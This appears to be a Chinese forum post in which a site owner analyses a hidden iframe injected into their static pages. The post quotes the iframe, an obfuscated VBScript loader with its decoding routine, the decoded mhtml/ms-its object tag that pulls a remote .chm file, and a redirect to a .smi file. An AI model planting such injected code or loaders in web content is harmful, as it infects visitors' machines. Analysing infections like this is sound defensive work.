静态页面中增加了下面的代码: <iframe src="hxxp://www.gas169.com/123/sss.asp" width="0" height="0" frameborder="0"></iframe> :angry:
隐藏的有点深 hxxp://www.gas169.com/123/sss.asp 只有两行 hxxp://www.gas169.com/js/4.htm hxxp://www.gas169.com/js/realx.htm 打开 4.htm 如何如下: <SCRIPT language=vbscript> hu="琳n5B7LRBA6BAG8KG@8AHoTE8GHEAR94?F8TRBA7E4:FG4EGoTE8GHEAR94?F8TRBAF8?86GFG4EGRoTE8GHEAR94?F8TRBAF8?86GoT7B6H@8AG`F8?86G<BA`8@CGLZ[TRBA6BCLoT7B6H@8AG`F8?86G<BA`8@CGLZ[TRBA589BE86BCLoTE8GHEAR94?F8TRBA@BHF8HCoT7B6H@8AG`F8?86G<BA`8@CGLZ[TpnABF6E<CGpn<9E4@8RFE6o\pna<9E4@8pnaABF6E<CGp琳nG8KG4E84R<7oT6B78TRFGL?8oT7<FC?4LlABA8mTp琳nB5=86GR74G4oTXUcbkmF_<GFl@;G@?l9<?8laa6l/9BB`@;GSVNC4G;Paf`6;@llaf`;G@TRGLC8oTG8KGaK_F6E<CG?8GTp琳naB5=86Gp琳naG8KG4E84p琳nF6E<CGR?4A:H4:8oT=4I4F6E<CGTp琳7B6H@8AG`JE<G8Z6B78`I4?H8`E8C?468Za/VNC4G;Pa:^?B64G<BA`;E89`FH5FGE<A:Zb^?B64G<BA`;E89`<A78K""9ZYf`;G@Y[[[[m琳naF6E<CGp琳" function UnEncode(temp) but=50 for i = 1 to len(temp) if mid(temp,i,1)<> "琳" then If Asc(Mid(temp, i, 1)) < 32 Or Asc(Mid(temp, i, 1)) > 126 Then a = a & Chr(Asc(Mid(temp, i, 1))) else pk=asc(mid(temp,i,1))-but if pk>126 then pk=pk-95 elseif pk<32 then pk=pk+95 end if a=a&chr(pk) end if else a=a&vbcrlf end if next UnEncode=a end function document.write(UnEncode(hu)) </SCRIPT> 把最后一行的 document.write 改成 alert ,运行可以看到代码 是一小段 html + js . 最终的效果是: <object data="m"s-its:mhtml:file://c:\foo.mht!hxxp://www.gas169.com/js/4.chm:4.htm type="text/x-scriptlet"></object> 我也没太看明白,大约是下载打开那个 4.chm 而 hxxp://www.gas169.com/js/realx.htm 内容: <script language=javascript>location.href='./realx.smi';</script> <center>对不起,此页面未授权访问!</center> 在公司,一下不能检测是什么东东。